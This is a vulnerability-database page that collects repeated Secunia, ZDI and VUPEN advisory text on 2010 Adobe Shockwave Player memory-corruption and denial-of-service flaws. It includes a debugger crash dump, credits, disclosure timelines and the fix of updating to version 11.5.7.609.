VARIoT IoT vulnerabilities database
| VAR-201005-0106 | CVE-2010-1287 | Adobe Shockwave Player Vulnerable to arbitrary code execution |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Adobe Shockwave Player before 11.5.7.609 allows attackers to cause a denial of service (memory corruption) or possibly execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2010-1284, CVE-2010-1286, CVE-2010-1289, CVE-2010-1290, and CVE-2010-1291. Adobe Shockwave Player is prone to a memory-corruption vulnerability.
Adobe Shockwave Player 11.5.6.606 and prior are vulnerable.
NOTE: This issue was previously discussed in BID 40066 (Adobe Shockwave Player APSB10-12 Multiple Remote Vulnerabilities) but has been given its own record to better document it. These people now have access to some of the best the Web has to offer - including dazzling 3D games and entertainment, interactive product demonstrations, and online learning applications. The vulnerable software fails to sanitize user input when processing .dir files resulting in a crash and overwrite of a few memory registers.<br/><br/> --------------------------------------------------------------------------------<br/><br/><code> (f94.ae4): Access violation - code c0000005 (first chance)<br/> First chance exceptions are reported before any exception handling.<br/> This exception may be expected and handled.<br/> eax=20a0a0a0 ebx=207d004c ecx=00000400 edx=41414140 esi=00000000 edi=a80487d8<br/> eip=68008bd6 esp=0012de4c ebp=00000400 iopl=0 nv up ei pl nz na pe nc<br/> cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050206<br/> *** WARNING: Unable to verify checksum for C:\Program Files\Adobe\Adobe Director 11\DIRAPI.dll<br/> *** ERROR: Symbol file could not be found. Defaulted to export symbols for DIRAPI.dll - <br/> DIRAPI!Ordinal14+0x3b16:<br/> 68008bd6 2b4f04 sub ecx,dword ptr [edi+4] ds:0023:a80487dc=????????<br/><br/>-----------------------<br/><br/>EAX FFFFFFFF<br/>ECX 41414141<br/>EDX FFFFFFFF<br/>EBX 00000018<br/>ESP 0012F3B4<br/>EBP 02793578<br/>ESI 0012F3C4<br/>EDI 02793578<br/>EIP 69009F1F IML32.69009F1F<br/></code><br/>--------------------------------------------------------------------------------<br/><br/>Tested on: Microsoft Windows XP Professional SP3 (English). ----------------------------------------------------------------------
Looking for a job?
Secunia is hiring skilled researchers and talented developers.
1) A boundary error while processing FFFFFF45h Shockwave 3D blocks
can be exploited to corrupt memory.
2) A signedness error in the processing of Director files can be
exploited to corrupt memory.
3) An array indexing error when processing Director files can be
exploited to corrupt memory.
4) An integer overflow error when processing Director files can be
exploited to corrupt memory.
5) An error when processing asset entries contained in Director files
can be exploited to corrupt memory.
6) A boundary error when processing embedded fonts can be exploited
to cause a heap-based buffer overflow via a specially crafted
Director file.
7) An error when processing Director files can be exploited to
overwrite 4 bytes of memory.
8) An error in the implementation of ordinal function 1409 in
iml32.dll can be exploited to corrupt heap memory via a specially
crafted Director file.
9) An error when processing a 4-byte field inside FFFFFF49h Shockwave
3D blocks can be exploited to corrupt heap memory.
10) An unspecified error can be exploited to corrupt memory.
11) A second unspecified error can be exploited to corrupt memory.
12) A third unspecified error can be exploited to corrupt memory.
13) A fourth unspecified error can be exploited to cause a buffer
overflow.
14) A fifth unspecified error can be exploited to corrupt memory.
15) A sixth unspecified error can be exploited to corrupt memory.
16) A seventh unspecified error can be exploited to corrupt memory.
17) An error when processing signed values encountered while parsing
"pami" RIFF chunks can be exploited to corrupt memory.
The vulnerabilities are reported in versions 11.5.6.606 and prior on
Windows and Macintosh.
SOLUTION:
Update to version 11.5.7.609.
http://get.adobe.com/shockwave/
PROVIDED AND/OR DISCOVERED BY:
1-6) Alin Rad Pop, Secunia Research
The vendor also credits:
2) Nahuel Riva of Core Security Technologies.
3) Chaouki Bekrar of Vupen, Code Audit Labs, and an anonymous person
working with iDefense.
7) Chaouki Bekrar and Sebastien Renaud of Vupen, Code Audit Labs,
Gjoko Krstic of Zero Science Lab, and Chro HD of Fortinet's
FortiGuard Labs.
8, 17) an anonymous person working with ZDI.
9) Chaouki Bekrar of Vupen and an anonymous person working with ZDI.
10) Chaouki Bekrar of Vupen.
11-16) Chro HD of Fortinet's FortiGuard Labs.
CHANGELOG:
2010-05-12: Updated "Extended Description" and added PoCs for
vulnerabilities #2, #3, #4, and #6.
ORIGINAL ADVISORY:
Adobe:
http://www.adobe.com/support/security/bulletins/apsb10-12.html
Secunia Research:
http://secunia.com/secunia_research/2010-17/
http://secunia.com/secunia_research/2010-19/
http://secunia.com/secunia_research/2010-20/
http://secunia.com/secunia_research/2010-22/
http://secunia.com/secunia_research/2010-34/
http://secunia.com/secunia_research/2010-50/
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-10-087/
http://www.zerodayinitiative.com/advisories/ZDI-10-088/
http://www.zerodayinitiative.com/advisories/ZDI-10-089/
iDefense:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=869
Code Audit Labs:
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0137.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0138.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0139.html
Zero Science Lab:
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4937.php
Core Security Technologies:
http://www.coresecurity.com/content/adobe-director-invalid-read
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201005-0107 | CVE-2010-1288 | Adobe Shockwave Player Vulnerable to buffer overflow |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Buffer overflow in Adobe Shockwave Player before 11.5.7.609 might allow attackers to execute arbitrary code via unspecified vectors.
Adobe Shockwave Player 11.5.6.606 and prior are vulnerable.
NOTE: This issue was previously discussed in BID 40066 (Adobe Shockwave Player APSB10-12 Multiple Remote Vulnerabilities) but has been given its own record to better document it. These people now have access to some of the best the Web has to offer - including dazzling 3D games and entertainment, interactive product demonstrations, and online learning applications. The vulnerable software fails to sanitize user input when processing .dir files resulting in a crash and overwrite of a few memory registers.<br/><br/> --------------------------------------------------------------------------------<br/><br/><code> (f94.ae4): Access violation - code c0000005 (first chance)<br/> First chance exceptions are reported before any exception handling.<br/> This exception may be expected and handled.<br/> eax=20a0a0a0 ebx=207d004c ecx=00000400 edx=41414140 esi=00000000 edi=a80487d8<br/> eip=68008bd6 esp=0012de4c ebp=00000400 iopl=0 nv up ei pl nz na pe nc<br/> cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050206<br/> *** WARNING: Unable to verify checksum for C:\Program Files\Adobe\Adobe Director 11\DIRAPI.dll<br/> *** ERROR: Symbol file could not be found. Defaulted to export symbols for DIRAPI.dll - <br/> DIRAPI!Ordinal14+0x3b16:<br/> 68008bd6 2b4f04 sub ecx,dword ptr [edi+4] ds:0023:a80487dc=????????<br/><br/>-----------------------<br/><br/>EAX FFFFFFFF<br/>ECX 41414141<br/>EDX FFFFFFFF<br/>EBX 00000018<br/>ESP 0012F3B4<br/>EBP 02793578<br/>ESI 0012F3C4<br/>EDI 02793578<br/>EIP 69009F1F IML32.69009F1F<br/></code><br/>--------------------------------------------------------------------------------<br/><br/>Tested on: Microsoft Windows XP Professional SP3 (English). ----------------------------------------------------------------------
Looking for a job?
Secunia is hiring skilled researchers and talented developers.
1) A boundary error while processing FFFFFF45h Shockwave 3D blocks
can be exploited to corrupt memory.
2) A signedness error in the processing of Director files can be
exploited to corrupt memory.
3) An array indexing error when processing Director files can be
exploited to corrupt memory.
4) An integer overflow error when processing Director files can be
exploited to corrupt memory.
5) An error when processing asset entries contained in Director files
can be exploited to corrupt memory.
6) A boundary error when processing embedded fonts can be exploited
to cause a heap-based buffer overflow via a specially crafted
Director file.
7) An error when processing Director files can be exploited to
overwrite 4 bytes of memory.
8) An error in the implementation of ordinal function 1409 in
iml32.dll can be exploited to corrupt heap memory via a specially
crafted Director file.
9) An error when processing a 4-byte field inside FFFFFF49h Shockwave
3D blocks can be exploited to corrupt heap memory.
10) An unspecified error can be exploited to corrupt memory.
11) A second unspecified error can be exploited to corrupt memory.
12) A third unspecified error can be exploited to corrupt memory.
13) A fourth unspecified error can be exploited to cause a buffer
overflow.
14) A fifth unspecified error can be exploited to corrupt memory.
15) A sixth unspecified error can be exploited to corrupt memory.
16) A seventh unspecified error can be exploited to corrupt memory.
17) An error when processing signed values encountered while parsing
"pami" RIFF chunks can be exploited to corrupt memory.
Successful exploitation of the vulnerabilities may allow execution of
arbitrary code.
The vulnerabilities are reported in versions 11.5.6.606 and prior on
Windows and Macintosh.
SOLUTION:
Update to version 11.5.7.609.
http://get.adobe.com/shockwave/
PROVIDED AND/OR DISCOVERED BY:
1-6) Alin Rad Pop, Secunia Research
The vendor also credits:
2) Nahuel Riva of Core Security Technologies.
3) Chaouki Bekrar of Vupen, Code Audit Labs, and an anonymous person
working with iDefense.
7) Chaouki Bekrar and Sebastien Renaud of Vupen, Code Audit Labs,
Gjoko Krstic of Zero Science Lab, and Chro HD of Fortinet's
FortiGuard Labs.
8, 17) an anonymous person working with ZDI.
9) Chaouki Bekrar of Vupen and an anonymous person working with ZDI.
10) Chaouki Bekrar of Vupen.
11-16) Chro HD of Fortinet's FortiGuard Labs.
CHANGELOG:
2010-05-12: Updated "Extended Description" and added PoCs for
vulnerabilities #2, #3, #4, and #6.
ORIGINAL ADVISORY:
Adobe:
http://www.adobe.com/support/security/bulletins/apsb10-12.html
Secunia Research:
http://secunia.com/secunia_research/2010-17/
http://secunia.com/secunia_research/2010-19/
http://secunia.com/secunia_research/2010-20/
http://secunia.com/secunia_research/2010-22/
http://secunia.com/secunia_research/2010-34/
http://secunia.com/secunia_research/2010-50/
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-10-087/
http://www.zerodayinitiative.com/advisories/ZDI-10-088/
http://www.zerodayinitiative.com/advisories/ZDI-10-089/
iDefense:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=869
Code Audit Labs:
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0137.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0138.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0139.html
Zero Science Lab:
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4937.php
Core Security Technologies:
http://www.coresecurity.com/content/adobe-director-invalid-read
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201005-0111 | CVE-2010-1292 | Adobe Shockwave Player of pami RIFF chunk Arbitrary code execution vulnerability in parsing |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
The implementation of pami RIFF chunk parsing in Adobe Shockwave Player before 11.5.7.609 does not validate a certain value from a file before using it in file-pointer calculations, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted .dir (aka Director) file. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Shockwave. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the code responsible for parsing Director files. When the application parses the pami RIFF chunk, it trusts an offset value and seeks into the file data. If provided with signed values in the data at the given offset, the process can be made to incorrectly calculate a pointer and operate on the data at it's location. This can be abused by an attacker to execute arbitrary code under the context of the user running the browser.
Adobe Shockwave Player 11.5.6.606 and prior are vulnerable.
NOTE: This issue was previously discussed in BID 40066 (Adobe Shockwave Player APSB10-12 Multiple Remote Vulnerabilities) but has been given its own record to better document it. These people now have access to some of the best the Web has to offer - including dazzling 3D games and entertainment, interactive product demonstrations, and online learning applications. The vulnerable software fails to sanitize user input when processing .dir files resulting in a crash and overwrite of a few memory registers.<br/><br/> --------------------------------------------------------------------------------<br/><br/><code> (f94.ae4): Access violation - code c0000005 (first chance)<br/> First chance exceptions are reported before any exception handling.<br/> This exception may be expected and handled.<br/> eax=20a0a0a0 ebx=207d004c ecx=00000400 edx=41414140 esi=00000000 edi=a80487d8<br/> eip=68008bd6 esp=0012de4c ebp=00000400 iopl=0 nv up ei pl nz na pe nc<br/> cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050206<br/> *** WARNING: Unable to verify checksum for C:\Program Files\Adobe\Adobe Director 11\DIRAPI.dll<br/> *** ERROR: Symbol file could not be found. Defaulted to export symbols for DIRAPI.dll - <br/> DIRAPI!Ordinal14+0x3b16:<br/> 68008bd6 2b4f04 sub ecx,dword ptr [edi+4] ds:0023:a80487dc=????????<br/><br/>-----------------------<br/><br/>EAX FFFFFFFF<br/>ECX 41414141<br/>EDX FFFFFFFF<br/>EBX 00000018<br/>ESP 0012F3B4<br/>EBP 02793578<br/>ESI 0012F3C4<br/>EDI 02793578<br/>EIP 69009F1F IML32.69009F1F<br/></code><br/>--------------------------------------------------------------------------------<br/><br/>Tested on: Microsoft Windows XP Professional SP3 (English). ----------------------------------------------------------------------
Looking for a job?
Secunia is hiring skilled researchers and talented developers.
1) A boundary error while processing FFFFFF45h Shockwave 3D blocks
can be exploited to corrupt memory.
2) A signedness error in the processing of Director files can be
exploited to corrupt memory.
3) An array indexing error when processing Director files can be
exploited to corrupt memory.
4) An integer overflow error when processing Director files can be
exploited to corrupt memory.
5) An error when processing asset entries contained in Director files
can be exploited to corrupt memory.
6) A boundary error when processing embedded fonts can be exploited
to cause a heap-based buffer overflow via a specially crafted
Director file.
7) An error when processing Director files can be exploited to
overwrite 4 bytes of memory.
8) An error in the implementation of ordinal function 1409 in
iml32.dll can be exploited to corrupt heap memory via a specially
crafted Director file.
9) An error when processing a 4-byte field inside FFFFFF49h Shockwave
3D blocks can be exploited to corrupt heap memory.
10) An unspecified error can be exploited to corrupt memory.
11) A second unspecified error can be exploited to corrupt memory.
12) A third unspecified error can be exploited to corrupt memory.
13) A fourth unspecified error can be exploited to cause a buffer
overflow.
14) A fifth unspecified error can be exploited to corrupt memory.
15) A sixth unspecified error can be exploited to corrupt memory.
16) A seventh unspecified error can be exploited to corrupt memory.
17) An error when processing signed values encountered while parsing
"pami" RIFF chunks can be exploited to corrupt memory.
Successful exploitation of the vulnerabilities may allow execution of
arbitrary code.
The vulnerabilities are reported in versions 11.5.6.606 and prior on
Windows and Macintosh.
SOLUTION:
Update to version 11.5.7.609.
http://get.adobe.com/shockwave/
PROVIDED AND/OR DISCOVERED BY:
1-6) Alin Rad Pop, Secunia Research
The vendor also credits:
2) Nahuel Riva of Core Security Technologies.
3) Chaouki Bekrar of Vupen, Code Audit Labs, and an anonymous person
working with iDefense.
7) Chaouki Bekrar and Sebastien Renaud of Vupen, Code Audit Labs,
Gjoko Krstic of Zero Science Lab, and Chro HD of Fortinet's
FortiGuard Labs.
8, 17) an anonymous person working with ZDI.
9) Chaouki Bekrar of Vupen and an anonymous person working with ZDI.
10) Chaouki Bekrar of Vupen.
11-16) Chro HD of Fortinet's FortiGuard Labs.
CHANGELOG:
2010-05-12: Updated "Extended Description" and added PoCs for
vulnerabilities #2, #3, #4, and #6.
ORIGINAL ADVISORY:
Adobe:
http://www.adobe.com/support/security/bulletins/apsb10-12.html
Secunia Research:
http://secunia.com/secunia_research/2010-17/
http://secunia.com/secunia_research/2010-19/
http://secunia.com/secunia_research/2010-20/
http://secunia.com/secunia_research/2010-22/
http://secunia.com/secunia_research/2010-34/
http://secunia.com/secunia_research/2010-50/
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-10-087/
http://www.zerodayinitiative.com/advisories/ZDI-10-088/
http://www.zerodayinitiative.com/advisories/ZDI-10-089/
iDefense:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=869
Code Audit Labs:
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0137.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0138.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0139.html
Zero Science Lab:
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4937.php
Core Security Technologies:
http://www.coresecurity.com/content/adobe-director-invalid-read
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
.
-- Vendor Response:
Adobe has issued an update to correct this vulnerability. More
details can be found at:
http://www.adobe.com/support/security/bulletins/apsb10-12.html
-- Disclosure Timeline:
2010-04-08 - Vulnerability reported to vendor
2010-05-11 - Coordinated public release of advisory
-- Credit:
This vulnerability was discovered by:
* Anonymous
-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.
Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com
The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.
Our vulnerability disclosure policy is available online at:
http://www.zerodayinitiative.com/advisories/disclosure_policy/
Follow the ZDI on Twitter:
http://twitter.com/thezdi
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
| VAR-201005-0104 | CVE-2010-1284 | Adobe Shockwave Player Vulnerable to arbitrary code execution |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Adobe Shockwave Player before 11.5.7.609 allows attackers to cause a denial of service (memory corruption) or possibly execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2010-1286, CVE-2010-1287, CVE-2010-1289, CVE-2010-1290, and CVE-2010-1291. Adobe Shockwave Player is prone to multiple remote code-execution vulnerabilities. Failed exploit attempts may cause a denial-of-service condition.
Versions prior to Shockwave Player 11.5.7.609 are vulnerable.
NOTE: These issues were previously covered in BID 40066 (Adobe Shockwave Player APSB10-12 Multiple Remote Vulnerabilities); they have been given their own record to better document them. The vulnerable software fails to sanitize user input when processing .dir files resulting in a crash and overwrite of a few memory registers.<br/><br/> --------------------------------------------------------------------------------<br/><br/><code> (f94.ae4): Access violation - code c0000005 (first chance)<br/> First chance exceptions are reported before any exception handling.<br/> This exception may be expected and handled.<br/> eax=20a0a0a0 ebx=207d004c ecx=00000400 edx=41414140 esi=00000000 edi=a80487d8<br/> eip=68008bd6 esp=0012de4c ebp=00000400 iopl=0 nv up ei pl nz na pe nc<br/> cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050206<br/> *** WARNING: Unable to verify checksum for C:\Program Files\Adobe\Adobe Director 11\DIRAPI.dll<br/> *** ERROR: Symbol file could not be found. Defaulted to export symbols for DIRAPI.dll - <br/> DIRAPI!Ordinal14+0x3b16:<br/> 68008bd6 2b4f04 sub ecx,dword ptr [edi+4] ds:0023:a80487dc=????????<br/><br/>-----------------------<br/><br/>EAX FFFFFFFF<br/>ECX 41414141<br/>EDX FFFFFFFF<br/>EBX 00000018<br/>ESP 0012F3B4<br/>EBP 02793578<br/>ESI 0012F3C4<br/>EDI 02793578<br/>EIP 69009F1F IML32.69009F1F<br/></code><br/>--------------------------------------------------------------------------------<br/><br/>Tested on: Microsoft Windows XP Professional SP3 (English). ----------------------------------------------------------------------
Looking for a job?
Secunia is hiring skilled researchers and talented developers.
1) A boundary error while processing FFFFFF45h Shockwave 3D blocks
can be exploited to corrupt memory.
2) A signedness error in the processing of Director files can be
exploited to corrupt memory.
3) An array indexing error when processing Director files can be
exploited to corrupt memory.
4) An integer overflow error when processing Director files can be
exploited to corrupt memory.
5) An error when processing asset entries contained in Director files
can be exploited to corrupt memory.
6) A boundary error when processing embedded fonts can be exploited
to cause a heap-based buffer overflow via a specially crafted
Director file.
7) An error when processing Director files can be exploited to
overwrite 4 bytes of memory.
8) An error in the implementation of ordinal function 1409 in
iml32.dll can be exploited to corrupt heap memory via a specially
crafted Director file.
9) An error when processing a 4-byte field inside FFFFFF49h Shockwave
3D blocks can be exploited to corrupt heap memory.
10) An unspecified error can be exploited to corrupt memory.
11) A second unspecified error can be exploited to corrupt memory.
12) A third unspecified error can be exploited to corrupt memory.
13) A fourth unspecified error can be exploited to cause a buffer
overflow.
14) A fifth unspecified error can be exploited to corrupt memory.
15) A sixth unspecified error can be exploited to corrupt memory.
16) A seventh unspecified error can be exploited to corrupt memory.
17) An error when processing signed values encountered while parsing
"pami" RIFF chunks can be exploited to corrupt memory.
SOLUTION:
Update to version 11.5.7.609.
http://get.adobe.com/shockwave/
PROVIDED AND/OR DISCOVERED BY:
1-6) Alin Rad Pop, Secunia Research
The vendor also credits:
2) Nahuel Riva of Core Security Technologies.
3) Chaouki Bekrar of Vupen, Code Audit Labs, and an anonymous person
working with iDefense.
7) Chaouki Bekrar and Sebastien Renaud of Vupen, Code Audit Labs,
Gjoko Krstic of Zero Science Lab, and Chro HD of Fortinet's
FortiGuard Labs.
8, 17) an anonymous person working with ZDI.
9) Chaouki Bekrar of Vupen and an anonymous person working with ZDI.
10) Chaouki Bekrar of Vupen.
11-16) Chro HD of Fortinet's FortiGuard Labs.
CHANGELOG:
2010-05-12: Updated "Extended Description" and added PoCs for
vulnerabilities #2, #3, #4, and #6.
ORIGINAL ADVISORY:
Adobe:
http://www.adobe.com/support/security/bulletins/apsb10-12.html
Secunia Research:
http://secunia.com/secunia_research/2010-17/
http://secunia.com/secunia_research/2010-19/
http://secunia.com/secunia_research/2010-20/
http://secunia.com/secunia_research/2010-22/
http://secunia.com/secunia_research/2010-34/
http://secunia.com/secunia_research/2010-50/
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-10-087/
http://www.zerodayinitiative.com/advisories/ZDI-10-088/
http://www.zerodayinitiative.com/advisories/ZDI-10-089/
iDefense:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=869
Code Audit Labs:
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0137.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0138.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0139.html
Zero Science Lab:
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4937.php
Core Security Technologies:
http://www.coresecurity.com/content/adobe-director-invalid-read
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. These people now have access to some of the best the Web has to
offer
including dazzling 3D games and entertainment, interactive product
demonstrations, and online learning applications. Shockwave Player displays
Web content that has been created by Adobe Director." from Adobe.com
II.
III. Binary Analysis & Proof-of-concept
---------------------------------------
In-depth binary analysis, code execution exploits and proof-of-concept
codes are published through the VUPEN Binary Analysis & Exploits Service :
http://www.vupen.com/exploits/
V. CREDIT
--------------
These vulnerabilities were discovered by Chaouki Bekrar of VUPEN Security
VII. ABOUT VUPEN Security
---------------------------
VUPEN is a leading IT security research company providing vulnerability
management and security intelligence solutions which enable enterprises
and institutions to eliminate vulnerabilities before they can be exploited,
ensure security policy compliance and meaningfully measure and manage risks.
Governmental and federal agencies, and global enterprises in the financial
services, insurance, manufacturing and technology industries rely on VUPEN
to improve their security, prioritize resources, cut time and costs, and
stay ahead of the latest threats.
* VUPEN Vulnerability Notification Service:
http://www.vupen.com/english/services/
* VUPEN Binary Analysis & Exploits Service :
http://www.vupen.com/exploits/
* VUPEN Web Application Security Scanner (WASS):
http://www.vupen.com/english/wass/
VIII. REFERENCES
----------------------
http://www.vupen.com/english/advisories/2010/1128
http://www.adobe.com/support/security/bulletins/apsb10-12.html
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1284
IX. DISCLOSURE TIMELINE
-----------------------------
2010-02-24 - Vendor notified
2010-02-24 - Vendor response
2010-03-02 - Status update received
2010-05-07 - Status update received
2010-05-12 - Coordinated public Disclosure
| VAR-201005-0102 | CVE-2010-1282 | Adobe Shockwave Player Service disruption in (DoS) Vulnerabilities |
CVSS V2: 4.3 CVSS V3: 6.5 Severity: MEDIUM |
Adobe Shockwave Player before 11.5.7.609 allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via a crafted ATOM size in a .dir (aka Director) file. Adobe Shockwave Player is prone to a denial-of-service vulnerability.
Attackers can exploit this issue to cause the affected application to consume excessive resources, resulting in a denial-of-service condition.
Adobe Shockwave Player 11.5.6.606 and prior are vulnerable.
NOTE: This issue was previously discussed in BID 40066 (Adobe Shockwave Player APSB10-12 Multiple Remote Vulnerabilities) but has been given its own record to better document it. These people now have access to some of the best the Web has to offer - including dazzling 3D games and entertainment, interactive product demonstrations, and online learning applications. Shockwave Player displays Web content that has been created by Adobe Director.Shockwave Player version 11.5.6.606 and earlier from Adobe suffers from a memory consumption / corruption and buffer overflow vulnerabilities that can aid the attacker to cause denial of service scenarios and arbitrary code execution. The vulnerable software fails to sanitize user input when processing .dir files resulting in a crash and overwrite of a few memory registers.<br/><br/> --------------------------------------------------------------------------------<br/><br/><code> (f94.ae4): Access violation - code c0000005 (first chance)<br/> First chance exceptions are reported before any exception handling.<br/> This exception may be expected and handled.<br/> eax=20a0a0a0 ebx=207d004c ecx=00000400 edx=41414140 esi=00000000 edi=a80487d8<br/> eip=68008bd6 esp=0012de4c ebp=00000400 iopl=0 nv up ei pl nz na pe nc<br/> cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050206<br/> *** WARNING: Unable to verify checksum for C:\Program Files\Adobe\Adobe Director 11\DIRAPI.dll<br/> *** ERROR: Symbol file could not be found. Defaulted to export symbols for DIRAPI.dll - <br/> DIRAPI!Ordinal14+0x3b16:<br/> 68008bd6 2b4f04 sub ecx,dword ptr [edi+4] ds:0023:a80487dc=????????<br/><br/>-----------------------<br/><br/>EAX FFFFFFFF<br/>ECX 41414141<br/>EDX FFFFFFFF<br/>EBX 00000018<br/>ESP 0012F3B4<br/>EBP 02793578<br/>ESI 0012F3C4<br/>EDI 02793578<br/>EIP 69009F1F IML32.69009F1F<br/></code><br/>--------------------------------------------------------------------------------<br/><br/>Tested on: Microsoft Windows XP Professional SP3 (English). ----------------------------------------------------------------------
Looking for a job?
Secunia is hiring skilled researchers and talented developers.
1) A boundary error while processing FFFFFF45h Shockwave 3D blocks
can be exploited to corrupt memory.
2) A signedness error in the processing of Director files can be
exploited to corrupt memory.
3) An array indexing error when processing Director files can be
exploited to corrupt memory.
4) An integer overflow error when processing Director files can be
exploited to corrupt memory.
5) An error when processing asset entries contained in Director files
can be exploited to corrupt memory.
6) A boundary error when processing embedded fonts can be exploited
to cause a heap-based buffer overflow via a specially crafted
Director file.
7) An error when processing Director files can be exploited to
overwrite 4 bytes of memory.
8) An error in the implementation of ordinal function 1409 in
iml32.dll can be exploited to corrupt heap memory via a specially
crafted Director file.
9) An error when processing a 4-byte field inside FFFFFF49h Shockwave
3D blocks can be exploited to corrupt heap memory.
10) An unspecified error can be exploited to corrupt memory.
11) A second unspecified error can be exploited to corrupt memory.
12) A third unspecified error can be exploited to corrupt memory.
13) A fourth unspecified error can be exploited to cause a buffer
overflow.
14) A fifth unspecified error can be exploited to corrupt memory.
15) A sixth unspecified error can be exploited to corrupt memory.
16) A seventh unspecified error can be exploited to corrupt memory.
17) An error when processing signed values encountered while parsing
"pami" RIFF chunks can be exploited to corrupt memory.
Successful exploitation of the vulnerabilities may allow execution of
arbitrary code.
The vulnerabilities are reported in versions 11.5.6.606 and prior on
Windows and Macintosh.
SOLUTION:
Update to version 11.5.7.609.
http://get.adobe.com/shockwave/
PROVIDED AND/OR DISCOVERED BY:
1-6) Alin Rad Pop, Secunia Research
The vendor also credits:
2) Nahuel Riva of Core Security Technologies.
3) Chaouki Bekrar of Vupen, Code Audit Labs, and an anonymous person
working with iDefense.
7) Chaouki Bekrar and Sebastien Renaud of Vupen, Code Audit Labs,
Gjoko Krstic of Zero Science Lab, and Chro HD of Fortinet's
FortiGuard Labs.
8, 17) an anonymous person working with ZDI.
